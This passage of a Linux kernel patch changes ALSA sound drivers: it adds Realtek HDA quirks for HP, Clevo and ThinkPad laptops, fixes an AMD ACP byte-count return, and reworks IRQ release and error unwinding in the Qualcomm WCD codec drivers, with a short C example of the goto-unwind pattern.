+ 	ALC236_FIXUP_HP_MUTE_LED,
+ 	ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF,
+@@ -7203,6 +7220,7 @@ enum {
+ 	ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK_PIN,
+ 	ALC295_FIXUP_DELL_INSPIRON_TOP_SPEAKERS,
+ 	ALC236_FIXUP_DELL_DUAL_CODECS,
++	ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI,
+ };
+ 
+ /* A special fixup for Lenovo C940 and Yoga Duet 7;
+@@ -8556,6 +8574,10 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc285_fixup_hp_spectre_x360_mute_led,
+ 	},
++	[ALC236_FIXUP_HP_MUTE_LED_COEFBIT2] = {
++	    .type = HDA_FIXUP_FUNC,
++	    .v.func = alc236_fixup_hp_mute_led_coefbit2,
++	},
+ 	[ALC236_FIXUP_HP_GPIO_LED] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc236_fixup_hp_gpio_led,
+@@ -9069,8 +9091,6 @@ static const struct hda_fixup alc269_fixups[] = {
+ 	[ALC287_FIXUP_CS35L41_I2C_2] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = cs35l41_fixup_i2c_two,
+-		.chained = true,
+-		.chain_id = ALC269_FIXUP_THINKPAD_ACPI,
+ 	},
+ 	[ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED] = {
+ 		.type = HDA_FIXUP_FUNC,
+@@ -9207,6 +9227,12 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC255_FIXUP_DELL1_MIC_NO_PRESENCE,
+ 	},
++	[ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = cs35l41_fixup_i2c_two,
++		.chained = true,
++		.chain_id = ALC269_FIXUP_THINKPAD_ACPI,
++	},
+ };
+ 
+ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+@@ -9440,6 +9466,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x886d, "HP ZBook Fury 17.3 Inch G8 Mobile Workstation PC", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8870, "HP ZBook Fury 15.6 Inch G8 Mobile Workstation PC", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8873, "HP ZBook Studio 15.6 Inch G8 Mobile Workstation PC", ALC285_FIXUP_HP_GPIO_AMP_INIT),
++	SND_PCI_QUIRK(0x103c, 0x887a, "HP Laptop 15s-eq2xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x888d, "HP ZBook Power 15.6 inch G8 Mobile Workstation PC", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8895, "HP EliteBook 855 G8 Notebook PC", ALC285_FIXUP_HP_SPEAKERS_MICMUTE_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8896, "HP EliteBook 855 G8 Notebook PC", ALC285_FIXUP_HP_MUTE_LED),
+@@ -9644,6 +9671,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x5157, "Clevo W517GU1", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x51a1, "Clevo NS50MU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x51b1, "Clevo NS50AU", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0x51b3, "Clevo NS70AU", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x5630, "Clevo NP50RNJS", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70a1, "Clevo NB70T[HJK]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70b3, "Clevo NK70SB", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+@@ -9727,14 +9755,14 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x22be, "Thinkpad X1 Carbon 8th", ALC285_FIXUP_THINKPAD_HEADSET_JACK),
+ 	SND_PCI_QUIRK(0x17aa, 0x22c1, "Thinkpad P1 Gen 3", ALC285_FIXUP_THINKPAD_NO_BASS_SPK_HEADSET_JACK),
+ 	SND_PCI_QUIRK(0x17aa, 0x22c2, "Thinkpad X1 Extreme Gen 3", ALC285_FIXUP_THINKPAD_NO_BASS_SPK_HEADSET_JACK),
+-	SND_PCI_QUIRK(0x17aa, 0x22f1, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x17aa, 0x22f2, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x17aa, 0x22f3, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x17aa, 0x2316, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x17aa, 0x2317, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x17aa, 0x2318, "Thinkpad Z13 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x17aa, 0x2319, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+-	SND_PCI_QUIRK(0x17aa, 0x231a, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x22f1, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x22f2, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x22f3, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x2316, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x2317, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x2318, "Thinkpad Z13 Gen2", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x2319, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x231a, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
+ 	SND_PCI_QUIRK(0x17aa, 0x30bb, "ThinkCentre AIO", ALC233_FIXUP_LENOVO_LINE2_MIC_HOTKEY),
+ 	SND_PCI_QUIRK(0x17aa, 0x30e2, "ThinkCentre AIO", ALC233_FIXUP_LENOVO_LINE2_MIC_HOTKEY),
+ 	SND_PCI_QUIRK(0x17aa, 0x310c, "ThinkCentre Station", ALC294_FIXUP_LENOVO_MIC_LOCATION),
+@@ -10599,6 +10627,8 @@ static int patch_alc269(struct hda_codec *codec)
+ 		spec->shutup = alc256_shutup;
+ 		spec->init_hook = alc256_init;
+ 		spec->gen.mixer_nid = 0; /* ALC256 does not have any loopback mixer path */
++		if (codec->bus->pci->vendor == PCI_VENDOR_ID_AMD)
++			spec->en_3kpull_low = true;
+ 		break;
+ 	case 0x10ec0257:
+ 		spec->codec_variant = ALC269_TYPE_ALC257;
+diff --git a/sound/soc/amd/acp/amd.h b/sound/soc/amd/acp/amd.h
+index 5f2119f422715..12a176a50fd6e 100644
+--- a/sound/soc/amd/acp/amd.h
++++ b/sound/soc/amd/acp/amd.h
+@@ -173,7 +173,7 @@ int snd_amd_acp_find_config(struct pci_dev *pci);
+ 
+ static inline u64 acp_get_byte_count(struct acp_dev_data *adata, int dai_id, int direction)
+ {
+-	u64 byte_count, low = 0, high = 0;
++	u64 byte_count = 0, low = 0, high = 0;
+ 
+ 	if (direction == SNDRV_PCM_STREAM_PLAYBACK) {
+ 		switch (dai_id) {
+@@ -191,7 +191,7 @@ static inline u64 acp_get_byte_count(struct acp_dev_data *adata, int dai_id, int
+ 			break;
+ 		default:
+ 			dev_err(adata->dev, "Invalid dai id %x\n", dai_id);
+-			return -EINVAL;
++			goto POINTER_RETURN_BYTES;
+ 		}
+ 	} else {
+ 		switch (dai_id) {
+@@ -213,12 +213,13 @@ static inline u64 acp_get_byte_count(struct acp_dev_data *adata, int dai_id, int
+ 			break;
+ 		default:
+ 			dev_err(adata->dev, "Invalid dai id %x\n", dai_id);
+-			return -EINVAL;
++			goto POINTER_RETURN_BYTES;
+ 		}
+ 	}
+ 	/* Get 64 bit value from two 32 bit registers */
+ 	byte_count = (high << 32) | low;
+ 
++POINTER_RETURN_BYTES:
+ 	return byte_count;
+ }
+ 
+diff --git a/sound/soc/codecs/cs42l51-i2c.c b/sound/soc/codecs/cs42l51-i2c.c
+index 85238339fbcab..b2085ff4b3226 100644
+--- a/sound/soc/codecs/cs42l51-i2c.c
++++ b/sound/soc/codecs/cs42l51-i2c.c
+@@ -19,6 +19,12 @@ static struct i2c_device_id cs42l51_i2c_id[] = {
+ };
+ MODULE_DEVICE_TABLE(i2c, cs42l51_i2c_id);
+ 
++const struct of_device_id cs42l51_of_match[] = {
++	{ .compatible = "cirrus,cs42l51", },
++	{ }
++};
++MODULE_DEVICE_TABLE(of, cs42l51_of_match);
++
+ static int cs42l51_i2c_probe(struct i2c_client *i2c)
+ {
+ 	struct regmap_config config;
+diff --git a/sound/soc/codecs/cs42l51.c b/sound/soc/codecs/cs42l51.c
+index e88d9ff95cdfc..4b832d52f643f 100644
+--- a/sound/soc/codecs/cs42l51.c
++++ b/sound/soc/codecs/cs42l51.c
+@@ -826,13 +826,6 @@ int __maybe_unused cs42l51_resume(struct device *dev)
+ }
+ EXPORT_SYMBOL_GPL(cs42l51_resume);
+ 
+-const struct of_device_id cs42l51_of_match[] = {
+-	{ .compatible = "cirrus,cs42l51", },
+-	{ }
+-};
+-MODULE_DEVICE_TABLE(of, cs42l51_of_match);
+-EXPORT_SYMBOL_GPL(cs42l51_of_match);
+-
+ MODULE_AUTHOR("Arnaud Patard <arnaud.patard@rtp-net.org>");
+ MODULE_DESCRIPTION("Cirrus Logic CS42L51 ALSA SoC Codec Driver");
+ MODULE_LICENSE("GPL");
+diff --git a/sound/soc/codecs/cs42l51.h b/sound/soc/codecs/cs42l51.h
+index a79343e8a54ea..125703ede1133 100644
+--- a/sound/soc/codecs/cs42l51.h
++++ b/sound/soc/codecs/cs42l51.h
+@@ -16,7 +16,6 @@ int cs42l51_probe(struct device *dev, struct regmap *regmap);
+ void cs42l51_remove(struct device *dev);
+ int __maybe_unused cs42l51_suspend(struct device *dev);
+ int __maybe_unused cs42l51_resume(struct device *dev);
+-extern const struct of_device_id cs42l51_of_match[];
+ 
+ #define CS42L51_CHIP_ID			0x1B
+ #define CS42L51_CHIP_REV_A		0x00
+diff --git a/sound/soc/codecs/rt5640.c b/sound/soc/codecs/rt5640.c
+index 0f8e6dd214b0d..a7071d0a2562f 100644
+--- a/sound/soc/codecs/rt5640.c
++++ b/sound/soc/codecs/rt5640.c
+@@ -2562,9 +2562,10 @@ static void rt5640_enable_jack_detect(struct snd_soc_component *component,
+ 	if (jack_data && jack_data->use_platform_clock)
+ 		rt5640->use_platform_clock = jack_data->use_platform_clock;
+ 
+-	ret = request_irq(rt5640->irq, rt5640_irq,
+-			  IRQF_TRIGGER_RISING | IRQF_TRIGGER_FALLING | IRQF_ONESHOT,
+-			  "rt5640", rt5640);
++	ret = devm_request_threaded_irq(component->dev, rt5640->irq,
++					NULL, rt5640_irq,
++					IRQF_TRIGGER_RISING | IRQF_TRIGGER_FALLING | IRQF_ONESHOT,
++					"rt5640", rt5640);
+ 	if (ret) {
+ 		dev_warn(component->dev, "Failed to reguest IRQ %d: %d\n", rt5640->irq, ret);
+ 		rt5640_disable_jack_detect(component);
+@@ -2617,8 +2618,9 @@ static void rt5640_enable_hda_jack_detect(
+ 
+ 	rt5640->jack = jack;
+ 
+-	ret = request_irq(rt5640->irq, rt5640_irq,
+-			  IRQF_TRIGGER_RISING | IRQF_ONESHOT, "rt5640", rt5640);
++	ret = devm_request_threaded_irq(component->dev, rt5640->irq,
++					NULL, rt5640_irq, IRQF_TRIGGER_RISING | IRQF_ONESHOT,
++					"rt5640", rt5640);
+ 	if (ret) {
+ 		dev_warn(component->dev, "Failed to reguest IRQ %d: %d\n", rt5640->irq, ret);
+ 		rt5640->irq = -ENXIO;
+diff --git a/sound/soc/codecs/wcd-mbhc-v2.c b/sound/soc/codecs/wcd-mbhc-v2.c
+index 1911750f7445c..5da1934527f34 100644
+--- a/sound/soc/codecs/wcd-mbhc-v2.c
++++ b/sound/soc/codecs/wcd-mbhc-v2.c
+@@ -1454,7 +1454,7 @@ struct wcd_mbhc *wcd_mbhc_init(struct snd_soc_component *component,
+ 		return ERR_PTR(-EINVAL);
+ 	}
+ 
+-	mbhc = devm_kzalloc(dev, sizeof(*mbhc), GFP_KERNEL);
++	mbhc = kzalloc(sizeof(*mbhc), GFP_KERNEL);
+ 	if (!mbhc)
+ 		return ERR_PTR(-ENOMEM);
+ 
+@@ -1474,61 +1474,76 @@ struct wcd_mbhc *wcd_mbhc_init(struct snd_soc_component *component,
+ 
+ 	INIT_WORK(&mbhc->correct_plug_swch, wcd_correct_swch_plug);
+ 
+-	ret = devm_request_threaded_irq(dev, mbhc->intr_ids->mbhc_sw_intr, NULL,
++	ret = request_threaded_irq(mbhc->intr_ids->mbhc_sw_intr, NULL,
+ 					wcd_mbhc_mech_plug_detect_irq,
+ 					IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 					"mbhc sw intr", mbhc);
+ 	if (ret)
+-		goto err;
++		goto err_free_mbhc;
+ 
+-	ret = devm_request_threaded_irq(dev, mbhc->intr_ids->mbhc_btn_press_intr, NULL,
++	ret = request_threaded_irq(mbhc->intr_ids->mbhc_btn_press_intr, NULL,
+ 					wcd_mbhc_btn_press_handler,
+ 					IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 					"Button Press detect", mbhc);
+ 	if (ret)
+-		goto err;
++		goto err_free_sw_intr;
+ 
+-	ret = devm_request_threaded_irq(dev, mbhc->intr_ids->mbhc_btn_release_intr, NULL,
++	ret = request_threaded_irq(mbhc->intr_ids->mbhc_btn_release_intr, NULL,
+ 					wcd_mbhc_btn_release_handler,
+ 					IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 					"Button Release detect", mbhc);
+ 	if (ret)
+-		goto err;
++		goto err_free_btn_press_intr;
+ 
+-	ret = devm_request_threaded_irq(dev, mbhc->intr_ids->mbhc_hs_ins_intr, NULL,
++	ret = request_threaded_irq(mbhc->intr_ids->mbhc_hs_ins_intr, NULL,
+ 					wcd_mbhc_adc_hs_ins_irq,
+ 					IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 					"Elect Insert", mbhc);
+ 	if (ret)
+-		goto err;
++		goto err_free_btn_release_intr;
+ 
+ 	disable_irq_nosync(mbhc->intr_ids->mbhc_hs_ins_intr);
+ 
+-	ret = devm_request_threaded_irq(dev, mbhc->intr_ids->mbhc_hs_rem_intr, NULL,
++	ret = request_threaded_irq(mbhc->intr_ids->mbhc_hs_rem_intr, NULL,
+ 					wcd_mbhc_adc_hs_rem_irq,
+ 					IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 					"Elect Remove", mbhc);
+ 	if (ret)
+-		goto err;
++		goto err_free_hs_ins_intr;
+ 
+ 	disable_irq_nosync(mbhc->intr_ids->mbhc_hs_rem_intr);
+ 
+-	ret = devm_request_threaded_irq(dev, mbhc->intr_ids->hph_left_ocp, NULL,
++	ret = request_threaded_irq(mbhc->intr_ids->hph_left_ocp, NULL,
+ 					wcd_mbhc_hphl_ocp_irq,
+ 					IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 					"HPH_L OCP detect", mbhc);
+ 	if (ret)
+-		goto err;
++		goto err_free_hs_rem_intr;
+ 
+-	ret = devm_request_threaded_irq(dev, mbhc->intr_ids->hph_right_ocp, NULL,
++	ret = request_threaded_irq(mbhc->intr_ids->hph_right_ocp, NULL,
+ 					wcd_mbhc_hphr_ocp_irq,
+ 					IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 					"HPH_R OCP detect", mbhc);
+ 	if (ret)
+-		goto err;
++		goto err_free_hph_left_ocp;
+ 
+ 	return mbhc;
+-err:
++
++err_free_hph_left_ocp:
++	free_irq(mbhc->intr_ids->hph_left_ocp, mbhc);
++err_free_hs_rem_intr:
++	free_irq(mbhc->intr_ids->mbhc_hs_rem_intr, mbhc);
++err_free_hs_ins_intr:
++	free_irq(mbhc->intr_ids->mbhc_hs_ins_intr, mbhc);
++err_free_btn_release_intr:
++	free_irq(mbhc->intr_ids->mbhc_btn_release_intr, mbhc);
++err_free_btn_press_intr:
++	free_irq(mbhc->intr_ids->mbhc_btn_press_intr, mbhc);
++err_free_sw_intr:
++	free_irq(mbhc->intr_ids->mbhc_sw_intr, mbhc);
++err_free_mbhc:
++	kfree(mbhc);
++
+ 	dev_err(dev, "Failed to request mbhc interrupts %d\n", ret);
+ 
+ 	return ERR_PTR(ret);
+@@ -1537,9 +1552,19 @@ EXPORT_SYMBOL(wcd_mbhc_init);
+ 
+ void wcd_mbhc_deinit(struct wcd_mbhc *mbhc)
+ {
++	free_irq(mbhc->intr_ids->hph_right_ocp, mbhc);
++	free_irq(mbhc->intr_ids->hph_left_ocp, mbhc);
++	free_irq(mbhc->intr_ids->mbhc_hs_rem_intr, mbhc);
++	free_irq(mbhc->intr_ids->mbhc_hs_ins_intr, mbhc);
++	free_irq(mbhc->intr_ids->mbhc_btn_release_intr, mbhc);
++	free_irq(mbhc->intr_ids->mbhc_btn_press_intr, mbhc);
++	free_irq(mbhc->intr_ids->mbhc_sw_intr, mbhc);
++
+ 	mutex_lock(&mbhc->lock);
+ 	wcd_cancel_hs_detect_plug(mbhc,	&mbhc->correct_plug_swch);
+ 	mutex_unlock(&mbhc->lock);
++
++	kfree(mbhc);
+ }
+ EXPORT_SYMBOL(wcd_mbhc_deinit);
+ 
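
wcd_mbhc_init() above drops devm_* IRQ management in favour of explicit request_threaded_irq()/free_irq() pairs, unwinding in strict reverse order when any request fails. The goto-ladder pattern, condensed to a runnable sketch with stand-in acquire()/release() helpers:

/* Reverse-order unwind for a chain of acquisitions, as in
 * wcd_mbhc_init() above. acquire()/release() are stand-ins. */
#include <stdio.h>

static int acquire(int id)  { return id == 2 ? -1 : 0; /* 3rd one fails */ }
static void release(int id) { printf("release %d\n", id); }

static int init_all(void)
{
	int err;

	err = acquire(0);
	if (err)
		goto err_out;
	err = acquire(1);
	if (err)
		goto err_free_0;
	err = acquire(2);
	if (err)
		goto err_free_1;
	return 0;

err_free_1:			/* unwind strictly in reverse order */
	release(1);
err_free_0:
	release(0);
err_out:
	return err;
}

int main(void)
{
	printf("init_all() = %d\n", init_all());
	return 0;
}
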
+diff --git a/sound/soc/codecs/wcd934x.c b/sound/soc/codecs/wcd934x.c
+index 28175c746b9ae..0b5999c819db9 100644
+--- a/sound/soc/codecs/wcd934x.c
++++ b/sound/soc/codecs/wcd934x.c
+@@ -3044,6 +3044,17 @@ static int wcd934x_mbhc_init(struct snd_soc_component *component)
+ 
+ 	return 0;
+ }
++
++static void wcd934x_mbhc_deinit(struct snd_soc_component *component)
++{
++	struct wcd934x_codec *wcd = snd_soc_component_get_drvdata(component);
++
++	if (!wcd->mbhc)
++		return;
++
++	wcd_mbhc_deinit(wcd->mbhc);
++}
++
+ static int wcd934x_comp_probe(struct snd_soc_component *component)
+ {
+ 	struct wcd934x_codec *wcd = dev_get_drvdata(component->dev);
+@@ -3077,6 +3088,7 @@ static void wcd934x_comp_remove(struct snd_soc_component *comp)
+ {
+ 	struct wcd934x_codec *wcd = dev_get_drvdata(comp->dev);
+ 
++	wcd934x_mbhc_deinit(comp);
+ 	wcd_clsh_ctrl_free(wcd->clsh_ctrl);
+ }
+ 
+diff --git a/sound/soc/codecs/wcd938x.c b/sound/soc/codecs/wcd938x.c
+index 1d801a7b1469d..2316481c2541b 100644
+--- a/sound/soc/codecs/wcd938x.c
++++ b/sound/soc/codecs/wcd938x.c
+@@ -210,7 +210,7 @@ struct wcd938x_priv {
+ };
+ 
+ static const SNDRV_CTL_TLVD_DECLARE_DB_MINMAX(ear_pa_gain, 600, -1800);
+-static const SNDRV_CTL_TLVD_DECLARE_DB_MINMAX(line_gain, 600, -3000);
++static const DECLARE_TLV_DB_SCALE(line_gain, -3000, 150, -3000);
+ static const SNDRV_CTL_TLVD_DECLARE_DB_MINMAX(analog_gain, 0, 3000);
+ 
+ struct wcd938x_mbhc_zdet_param {
+@@ -2165,8 +2165,8 @@ static inline void wcd938x_mbhc_get_result_params(struct wcd938x_priv *wcd938x,
+ 	else if (x1 < minCode_param[noff])
+ 		*zdet = WCD938X_ZDET_FLOATING_IMPEDANCE;
+ 
+-	pr_err("%s: d1=%d, c1=%d, x1=0x%x, z_val=%d(milliOhm)\n",
+-		__func__, d1, c1, x1, *zdet);
++	pr_debug("%s: d1=%d, c1=%d, x1=0x%x, z_val=%d (milliohm)\n",
++		 __func__, d1, c1, x1, *zdet);
+ ramp_down:
+ 	i = 0;
+ 	while (x1) {
+@@ -2625,6 +2625,8 @@ static int wcd938x_mbhc_init(struct snd_soc_component *component)
+ 						     WCD938X_IRQ_HPHR_OCP_INT);
+ 
+ 	wcd938x->wcd_mbhc = wcd_mbhc_init(component, &mbhc_cb, intr_ids, wcd_mbhc_fields, true);
++	if (IS_ERR(wcd938x->wcd_mbhc))
++		return PTR_ERR(wcd938x->wcd_mbhc);
+ 
+ 	snd_soc_add_component_controls(component, impedance_detect_controls,
+ 				       ARRAY_SIZE(impedance_detect_controls));
+@@ -2633,6 +2635,14 @@ static int wcd938x_mbhc_init(struct snd_soc_component *component)
+ 
+ 	return 0;
+ }
++
++static void wcd938x_mbhc_deinit(struct snd_soc_component *component)
++{
++	struct wcd938x_priv *wcd938x = snd_soc_component_get_drvdata(component);
++
++	wcd_mbhc_deinit(wcd938x->wcd_mbhc);
++}
++
+ /* END MBHC */
+ 
+ static const struct snd_kcontrol_new wcd938x_snd_controls[] = {
+@@ -2652,8 +2662,8 @@ static const struct snd_kcontrol_new wcd938x_snd_controls[] = {
+ 		       wcd938x_get_swr_port, wcd938x_set_swr_port),
+ 	SOC_SINGLE_EXT("DSD_R Switch", WCD938X_DSD_R, 0, 1, 0,
+ 		       wcd938x_get_swr_port, wcd938x_set_swr_port),
+-	SOC_SINGLE_TLV("HPHL Volume", WCD938X_HPH_L_EN, 0, 0x18, 0, line_gain),
+-	SOC_SINGLE_TLV("HPHR Volume", WCD938X_HPH_R_EN, 0, 0x18, 0, line_gain),
++	SOC_SINGLE_TLV("HPHL Volume", WCD938X_HPH_L_EN, 0, 0x18, 1, line_gain),
++	SOC_SINGLE_TLV("HPHR Volume", WCD938X_HPH_R_EN, 0, 0x18, 1, line_gain),
+ 	WCD938X_EAR_PA_GAIN_TLV("EAR_PA Volume", WCD938X_ANA_EAR_COMPANDER_CTL,
+ 				2, 0x10, 0, ear_pa_gain),
+ 	SOC_SINGLE_EXT("ADC1 Switch", WCD938X_ADC1, 1, 1, 0,
+@@ -3080,16 +3090,33 @@ static int wcd938x_irq_init(struct wcd938x_priv *wcd, struct device *dev)
+ static int wcd938x_soc_codec_probe(struct snd_soc_component *component)
+ {
+ 	struct wcd938x_priv *wcd938x = snd_soc_component_get_drvdata(component);
++	struct sdw_slave *tx_sdw_dev = wcd938x->tx_sdw_dev;
+ 	struct device *dev = component->dev;
++	unsigned long time_left;
+ 	int ret, i;
+ 
++	time_left = wait_for_completion_timeout(&tx_sdw_dev->initialization_complete,
++						msecs_to_jiffies(2000));
++	if (!time_left) {
++		dev_err(dev, "soundwire device init timeout\n");
++		return -ETIMEDOUT;
++	}
++
+ 	snd_soc_component_init_regmap(component, wcd938x->regmap);
+ 
++	ret = pm_runtime_resume_and_get(dev);
++	if (ret < 0)
++		return ret;
++
+ 	wcd938x->variant = snd_soc_component_read_field(component,
+ 						 WCD938X_DIGITAL_EFUSE_REG_0,
+ 						 WCD938X_ID_MASK);
+ 
+ 	wcd938x->clsh_info = wcd_clsh_ctrl_alloc(component, WCD938X);
++	if (IS_ERR(wcd938x->clsh_info)) {
++		pm_runtime_put(dev);
++		return PTR_ERR(wcd938x->clsh_info);
++	}
+ 
+ 	wcd938x_io_init(wcd938x);
+ 	/* Set all interrupts as edge triggered */
+@@ -3098,6 +3125,8 @@ static int wcd938x_soc_codec_probe(struct snd_soc_component *component)
+ 			     (WCD938X_DIGITAL_INTR_LEVEL_0 + i), 0);
+ 	}
+ 
++	pm_runtime_put(dev);
++
+ 	wcd938x->hphr_pdm_wd_int = regmap_irq_get_virq(wcd938x->irq_chip,
+ 						       WCD938X_IRQ_HPHR_PDM_WD_INT);
+ 	wcd938x->hphl_pdm_wd_int = regmap_irq_get_virq(wcd938x->irq_chip,
+@@ -3109,20 +3138,26 @@ static int wcd938x_soc_codec_probe(struct snd_soc_component *component)
+ 	ret = request_threaded_irq(wcd938x->hphr_pdm_wd_int, NULL, wcd938x_wd_handle_irq,
+ 				   IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 				   "HPHR PDM WD INT", wcd938x);
+-	if (ret)
++	if (ret) {
+ 		dev_err(dev, "Failed to request HPHR WD interrupt (%d)\n", ret);
++		goto err_free_clsh_ctrl;
++	}
+ 
+ 	ret = request_threaded_irq(wcd938x->hphl_pdm_wd_int, NULL, wcd938x_wd_handle_irq,
+ 				   IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 				   "HPHL PDM WD INT", wcd938x);
+-	if (ret)
++	if (ret) {
+ 		dev_err(dev, "Failed to request HPHL WD interrupt (%d)\n", ret);
++		goto err_free_hphr_pdm_wd_int;
++	}
+ 
+ 	ret = request_threaded_irq(wcd938x->aux_pdm_wd_int, NULL, wcd938x_wd_handle_irq,
+ 				   IRQF_ONESHOT | IRQF_TRIGGER_RISING,
+ 				   "AUX PDM WD INT", wcd938x);
+-	if (ret)
++	if (ret) {
+ 		dev_err(dev, "Failed to request Aux WD interrupt (%d)\n", ret);
++		goto err_free_hphl_pdm_wd_int;
++	}
+ 
+ 	/* Disable watchdog interrupt for HPH and AUX */
+ 	disable_irq_nosync(wcd938x->hphr_pdm_wd_int);
+@@ -3137,7 +3172,7 @@ static int wcd938x_soc_codec_probe(struct snd_soc_component *component)
+ 			dev_err(component->dev,
+ 				"%s: Failed to add snd ctrls for variant: %d\n",
+ 				__func__, wcd938x->variant);
+-			goto err;
++			goto err_free_aux_pdm_wd_int;
+ 		}
+ 		break;
+ 	case WCD9385:
+@@ -3147,7 +3182,7 @@ static int wcd938x_soc_codec_probe(struct snd_soc_component *component)
+ 			dev_err(component->dev,
+ 				"%s: Failed to add snd ctrls for variant: %d\n",
+ 				__func__, wcd938x->variant);
+-			goto err;
++			goto err_free_aux_pdm_wd_int;
+ 		}
+ 		break;
+ 	default:
+@@ -3155,12 +3190,38 @@ static int wcd938x_soc_codec_probe(struct snd_soc_component *component)
+ 	}
+ 
+ 	ret = wcd938x_mbhc_init(component);
+-	if (ret)
++	if (ret) {
+ 		dev_err(component->dev,  "mbhc initialization failed\n");
+-err:
++		goto err_free_aux_pdm_wd_int;
++	}
++
++	return 0;
++
++err_free_aux_pdm_wd_int:
++	free_irq(wcd938x->aux_pdm_wd_int, wcd938x);
++err_free_hphl_pdm_wd_int:
++	free_irq(wcd938x->hphl_pdm_wd_int, wcd938x);
++err_free_hphr_pdm_wd_int:
++	free_irq(wcd938x->hphr_pdm_wd_int, wcd938x);
++err_free_clsh_ctrl:
++	wcd_clsh_ctrl_free(wcd938x->clsh_info);
++
+ 	return ret;
+ }
+ 
++static void wcd938x_soc_codec_remove(struct snd_soc_component *component)
++{
++	struct wcd938x_priv *wcd938x = snd_soc_component_get_drvdata(component);
++
++	wcd938x_mbhc_deinit(component);
++
++	free_irq(wcd938x->aux_pdm_wd_int, wcd938x);
++	free_irq(wcd938x->hphl_pdm_wd_int, wcd938x);
++	free_irq(wcd938x->hphr_pdm_wd_int, wcd938x);
++
++	wcd_clsh_ctrl_free(wcd938x->clsh_info);
++}
++
+ static int wcd938x_codec_set_jack(struct snd_soc_component *comp,
+ 				  struct snd_soc_jack *jack, void *data)
+ {
+@@ -3177,6 +3238,7 @@ static int wcd938x_codec_set_jack(struct snd_soc_component *comp,
+ static const struct snd_soc_component_driver soc_codec_dev_wcd938x = {
+ 	.name = "wcd938x_codec",
+ 	.probe = wcd938x_soc_codec_probe,
++	.remove = wcd938x_soc_codec_remove,
+ 	.controls = wcd938x_snd_controls,
+ 	.num_controls = ARRAY_SIZE(wcd938x_snd_controls),
+ 	.dapm_widgets = wcd938x_dapm_widgets,
